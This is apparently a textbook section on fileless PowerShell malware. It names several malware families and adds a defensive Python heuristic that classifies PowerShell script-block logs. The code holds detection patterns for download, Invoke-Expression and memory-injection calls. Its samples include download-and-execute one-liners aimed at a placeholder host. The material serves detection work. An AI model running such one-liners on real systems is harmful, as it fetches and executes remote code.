3.4.4 Fileless malware

This is an ongoing trend. Fileless malware is usually written in PowerShell, a scripting language used on Windows to automate tasks. When the PowerShell script is executed, it can download code and inject it directly into the memory of a legitimate process, so the downloaded malware is never written to disk as a file. Hence, we call these fileless attacks. Most PowerShell malware can be categorized as downloaders.

Here is a list of fileless malware:

  • Poweliks
  • Kovter
  • PowerSniff
  • POSHSPY

SoreBrect is a piece of ransomware that uses the fileless technique.
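
A defender's view of the behaviour described above, as an added example that is not from the book: a Python heuristic that labels PowerShell script-block text (for instance, as recorded by script block logging, event ID 4104) by whether fetched content is run in memory or written to disk. The indicator patterns, labels, event ids and sample lines are assumptions constructed for illustration.

```python
import re

# Indicator groups for PowerShell script-block text. Patterns are
# illustrative assumptions for this example, not an exhaustive rule set.
INDICATORS = {
    # Content fetched over the network
    "net_fetch": re.compile(
        r"downloadstring|downloaddata|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b", re.I),
    # Text handed straight to the interpreter
    "dynamic_exec": re.compile(r"invoke-expression|\biex\b|\[scriptblock\]::create", re.I),
    # Win32 calls used to place code in a process's memory
    "mem_inject": re.compile(r"virtualalloc(ex)?|writeprocessmemory|createremotethread", re.I),
    # Fetched content explicitly lands on disk
    "disk_write": re.compile(r"-outfile\b|downloadfile|out-file|set-content", re.I),
}

def indicators(script_text):
    """Return the names of all indicator groups found in the text."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_text)}

def classify(script_text):
    """Label a script block by where fetched content ends up."""
    hits = indicators(script_text)
    runs_in_memory = bool(hits & {"dynamic_exec", "mem_inject"})
    if "net_fetch" in hits and runs_in_memory and "disk_write" not in hits:
        return "fileless-downloader"
    if "net_fetch" in hits and "disk_write" in hits:
        return "download-to-disk"
    if "mem_inject" in hits:
        return "memory-injection"
    return "no-indicator"

# Constructed sample script blocks (not taken from any real incident).
SAMPLES = {
    "evt-1": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')",
    "evt-2": "Invoke-WebRequest -Uri http://example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip",
    "evt-3": "$c = (New-Object Net.WebClient).DownloadString($u); [ScriptBlock]::Create($c).Invoke()",
    "evt-4": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
}

def triage(samples):
    """Map each event id to its label."""
    return {eid: classify(text) for eid, text in samples.items()}

if __name__ == "__main__":
    for eid, label in triage(SAMPLES).items():
        print(eid, label)
```

String matching of this kind misses obfuscated or encoded script text, so a hit is a triage lead rather than a verdict.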
